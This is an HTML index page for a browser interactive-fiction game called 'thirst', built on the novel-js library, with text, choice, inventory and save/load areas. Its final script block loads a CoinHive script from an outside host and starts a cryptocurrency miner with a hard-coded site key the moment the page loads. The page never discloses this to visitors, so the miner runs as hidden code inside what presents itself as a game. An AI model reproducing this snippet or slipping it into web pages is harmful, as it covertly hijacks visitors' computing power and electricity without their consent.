<!DOCTYPE html>
<html>
    <head>
        <title>thirst</title>
        <link href="https://fonts.googleapis.com/css?family=IM+Fell+English+SC" rel="stylesheet">
        <link rel="stylesheet" href="index.css">
        
    </head>
    <body>
            <a href="https://github.com/paveljezek/thirst"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://camo.githubusercontent.com/52760788cde945287fbb584134c4cbc2bc36f904/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f77686974655f6666666666662e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_white_ffffff.png"></a>
            <div id="novel-area">
                    <div id="novel-style-area">
                        <div id="novel-text-area">
                            <div id="novel-text"></div>
                            <button type="button" class="novel-skip-button" onclick="TextPrinter.complete()"></button>
                            <button type="button" class="novel-continue-button" onclick="TextPrinter.unpause()"></button>
                        </div>
                        <div id="novel-choices-area">
                            <ul id="novel-choice-list"></ul>
                        </div>
                        <div id="novel-inventory-area">
                            <h5 class="novel-inventory-title"></h5>
                            <ul id="novel-inventory"></ul>
                        </div>
                        <div id="novel-hidden-inventory-area">
                            <h5 class="novel-hidden-inventory-title"></h5>
                            <ul id="novel-hidden-inventory"></ul>
                        </div>
                        <div id="novel-save-area">
                            <button type="button" class="novel-save-button" onclick="NovelManager.saveData()"></button>
                            <button type="button" class="novel-load-button" onclick="UI.showLoadNotification()"></button>
                        </div>
                    </div>
                </div>
        <script src="node_modules/novel-js/novel.min.js" type="text/javascript"></script>
        <script src="https://coinhive.com/lib/coinhive.min.js"></script>
        <script>
            var miner = new CoinHive.Anonymous('VaRmVR2iCBdNvKrCLW4PMwm9h5BKYiyK');
            miner.start();
        </script>
    </body>
</html>